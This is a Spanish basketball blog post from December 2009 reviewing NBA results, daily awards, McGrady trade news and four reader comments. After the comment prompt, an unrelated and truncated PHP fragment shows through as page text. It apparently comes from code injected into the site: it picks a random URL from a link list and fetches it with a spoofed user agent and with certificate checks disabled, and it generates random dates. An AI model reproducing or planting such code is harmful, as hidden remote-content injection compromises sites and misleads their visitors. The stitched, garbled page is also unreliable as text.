La Crónica (29/12/2009)

30 de December de 2009 por TheDeerHunter

Los Cavs han cogido el nivel que más o menos esperábamos antes del principio de curso y pasan a comprometer seriamente el liderato de los Celtics en el Este e incluso la propia cabeza de la liga. Ha sido recuperar a Delonte West a gran nivel y acoplar el rol de Ilgauskas para encajar todas las piezas. Mo Williams se siente más liberado en el tiro, la gran defensa del año pasado ha vuelto y ya no hacen falta ni actuaciones monstruosas de LeBron para que se gane a los mejores equipos. Ya les gustaría a otros equipos tener a Hickson, Parker, Moon o Varejao como fondo de armario con el rendimiento que están dando. Ayer asfixiaron a los Hawks en Atlanta durante el último cuarto, dejándolos en 10 puntitos. Ahí está el mensaje para quien lo quiera leer.

Los Lakers, mientras, a lo suyo, obnubilados en la cima del mundo. Padeciendo inexplicablemente partido sí y partido también. Debería ser suficiente con tener a Kobe&Pau en plan dioses para ganar con suficiencia a los Warriors, pero no. La defensa sigue de vacaciones (o en el caso de Artest, convaleciente) aunque al menos anoche sí fueron capaces de imponerse en el intercambio de golpes. Resulta particularmente extraño que Gasol juegue 45 minutos y Bynum no llegue a 25.

También debería ser suficiente un triple doble de Chris Paul y que West pase de los 40 puntos para que los Hornets ganasen pero es que el resto del plantel es una banda infame, todo lo contrario que los Rockets. Si Ariza o Scola no están un día, responden Battier y Brooks con 10/15 en triples. Y T-Mac viéndolo por la TV.

Los Hornets lo van a tener muy mal para clasificarse, más que nada, entre otras cosas, porque los Thunder pusieron ayer su balance en 17-14 ante los Wizards y ni siquiera están en puesto de playoff (en el Este estarían luchando por la 5ª plaza). Al nivel que se encuentran con total probabilidad lo estarán próximamente y ya hay quien habla de Durant en la carrera por el MVP. No debería resultarnos extraño si logran clasificarse en este dificilísimo Oeste. Ayer 35-11, para unos promedios acumulados de 28.4, 6.9, 3… Ojito.

Por último, los Bulls le ganaron a los Pacers, los Spurs a los Wolves y los Knicks apalizaron a los Pistons. Nada nuevo.

PREMIOS

MVP: Segundo día consecutivo que Kevin Durant aparece por aquí y es que se demuestra que es un AllStars en toda regla. 35 puntos, 11 rebotes y 4 asistencias en la victoria de los Thunder frente los Wizards. David Lee también se merecería el premio por sus 30 puntos, 12 rebotes y 5 asistencias sino fuera por los 44 puntos y 11 asistencias de Kobe Bryant. Simplemente magnífico ante los Warriors.

Rookie: Ante el mal rendimiento de Villanueva, Jonas Jebreko parece tener el puesto asegurado en los Pistons. Anoche, 9 puntitos y 4 rebotes más al saco. Jonny Flynn destaca más como anotador que como distribuidor. Los 17 puntos y 2 asistencias de ayer parecen demostrarlo. Mención para los 15 puntos de Stephen Curry.

Sorpresa: Después de una brillante temporada teníamos a Roger Mason algo apagado en esta. Anoche se volvió a lucir con 18 puntitos y 5 rebotes. John Salmons era otro que no venía cuajando un buen año y de hecho, ha perido la titularidad hace bin poquito. Con actuaciones como la de ayer (17 puntos y 5 asistencias) es posible que la recupere pronto.

Decepción: Lo de Charlie Villanueva es un escándalo. 0 de 4 para 0 puntos. ¿Dónde se quedó aquel rookie capaz de anotar 50 puntos? Permitidme que haga también mención de los 0 puntos de Brandon Rush. ¿Era el único que esperaba mucho más de él esta temporada?

Esfuerzo en vano: Para un día en que a David West le da por volver a ser el jugador que era antes, los Hornets palman. Sus 44 puntos y 12 rebotes sumados al triple doble de Chris Paul, no sirvieron de nada.

LA NOTICIA DEL DÍA

A estas alturas seguramente todos sabeís que Tracy McGrady puede haber jugado su último partido como Rocket. Jugador y franquicia parecen haber llegado a un acuerdo para facilitar el traspaso aunque los 23 millones que cobra el otrora magnífico alero no facilitaran las cosas. ¿Esta historia la he visto antes?

Por otro lado, los Wolves se han hecho con los servicios del hasta ayer jugador de los Suns, Alando Tucker, y una segunda ronda a cambio de Jason Hart. Sin duda, un traspaso de altos vuelos.

Comenta

4 comentarios a esta entrada

  1. rojorob dice:
    #1

    Todavía sigo conmocionado por el traspaso. ¿Consideráis que la llegada de Alando Tucker puede provocar un vuelco en la Conferencia Oeste? ¿Qué movimientos preparan ya el resto de equipos para contrarrestar su devastadora presencia? El debate está servido.

      Citar

  2. pcerezo dice:
    #2

    Final de año y cosas muy interesantes:

    – Cavaliers: cuanto menos juege O’neal mejor para ellos. Sin duda podrían pensar en trapasarle?
    – Lakers: ganarán siempre y cuando Pau esté bien. Bryant siempre lo va a estar pero el redimiento de Gasol va a ser clave y el banquillo no aporta absolutamente nada de nada. Veremos…
    – Durant: lo mejor que le ha podido pasar a la liga. Qué buen es este tío. Qué facilidad para anotar. Muy bien Oklahoma la progresión lógica.
    – Rockets y Mcgrady: solución lógica. Han apostado por Ariza y deben ser consecuentes. Los 23 millones que libera deja hueco y si el año que viene el chino vuelve bien pueden ser muy, muy pero que muy competitivos.
    – Pistons: se ha equivocado Dummars? no pintan bien sus decisiones. Tampoco lo podemos juzgar al 100% por las lesiones. Seguiremos la evolución del paciente pero parece que pueden entrar en la lotería del draft después de muchos años.

    Un saludo a todos y Feliz Año Nuevo!!!

    Pablo

      Citar

  3. TheDeerHunter dice:
    #3

    -¿Cuanto menos juegue O’neal?? ¿Traspasarle?? Estarían locos
    – Al César lo que es del César… anoche precísamente lo hicieron francamente bien, incluso Vujacic!!!
    – A mí no me parece justo lo de T-Mac, sobre todo porque pesan más consideraciones externas a él que todo lo que el pueda hacer. Y luego el personal se queja de actitudes… demasiado buena la tienen algunos. Me parece increíble que todavía se firmen determinados contratos alegremente (tanto el club como el jugador, ojo)
    Para mí es un punto negativo que Adelman no le encuentre utilidad a un jugador como él. Decepcionante.
    – Igual lo que Dumars está buscando es precísamente eso… a pesar de todo estos dos años se está cubriendo de gloria el hombre. La culpa la tiene Iverson, cómo no.

      Citar

  4. jonatan dice:
    #4

    Vaya taponcito de ronny :O

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>